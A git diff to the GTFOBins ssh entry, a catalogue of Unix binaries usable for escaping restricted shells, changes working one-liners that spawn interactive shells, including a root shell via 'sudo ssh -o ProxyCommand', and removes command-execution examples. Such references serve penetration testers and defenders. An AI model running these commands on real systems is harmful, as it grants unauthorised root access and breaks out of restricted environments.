diff --git a/_gtfobins/ssh.md b/_gtfobins/ssh.md index 5409be6..5ae09aa 100644 --- a/_gtfobins/ssh.md +++ b/_gtfobins/ssh.md @@ -4,19 +4,10 @@ functions: - description: Reconnecting may help bypassing restricted shells. code: ssh localhost $SHELL --noprofile --norc - description: Spawn interactive shell through ProxyCommand option. - code: ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/bash -i'" whatever.invalid - execute-non-interactive: - - description: The executed command output is not shown and can be redirected to a file. - code: | - CMD=/usr/bin/id - ssh -o ProxyCommand="${CMD}" whatever.invalid + code: ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x sudo-enabled: - description: Spawn interactive root shell through ProxyCommand option. - code: sudo ssh -o ProxyCommand="/bin/bash -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/bash -i'" whatever.invalid - - description: The executed command output is not shown and can be redirected to a file. - code: | - CMD=/usr/bin/id - sudo ssh -o ProxyCommand="${CMD}" whatever.invalid + code: sudo ssh -o ProxyCommand="/bin/sh -c 'exec 10<&0 11>&1 0<&2 1>&2; /bin/sh -i'" x download: - description: Fetch a remote file from a SSH server. code: |